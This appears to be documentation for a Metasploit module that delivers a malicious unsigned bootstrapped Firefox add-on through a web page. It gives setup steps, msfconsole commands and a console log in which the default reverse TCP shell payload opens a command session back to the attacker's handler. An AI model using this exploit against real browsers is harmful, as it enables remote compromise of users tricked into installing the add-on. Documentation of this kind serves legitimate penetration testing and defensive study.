## Vulnerable Application Mozilla Firefox before version 41 allowed users to install unsigned browser extensions from arbitrary web servers. This module dynamically creates an unsigned .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed. As of Firefox 41, unsigned extensions can still be installed on Firefox Nightly, Unbranded and Development builds when configured with `xpinstall.signatures.required` set to `false`. Note: this module generates legacy extensions which are supported only in Firefox before version 57. ### Installation Download an old Developer Edition (version 4 < 57) installer from: * https://download-origin.cdn.mozilla.net/pub/devedition/releases/ Browse to `about:config` and set `xpinstall.signatures.required` to `false`. Open Tools -> Options, search for "updates" and select "Never check for updates". ## Verification Steps 1. Start `msfconsole` 1. Do: `use exploit/multi/browser/firefox_xpi_bootstrapped_addon` 1. Do: `set SRVHOST [IP]` 1. Do: `run` ## Options ## Scenarios ### Firefox Developer Edition 56.0b9 on Windows 7 SP1 (x64) with xpinstall.signatures.required disabled Run the module and load the web server URL in Firefox. Install the extension when prompted. ``` msf6 post(windows/gather/enum_domains) > use exploit/multi/browser/firefox_xpi_bootstrapped_addon [*] No payload configured, defaulting to generic/shell_reverse_tcp msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > run [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.200.130:4444 [*] Using URL: http://192.168.200.130:8080/Oj8qCs [*] Server started. msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > [*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Redirecting request. [*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Sending HTML response. [*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'... [*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'... [*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.190:49861) at 2022-09-04 01:46:40 -0400 ```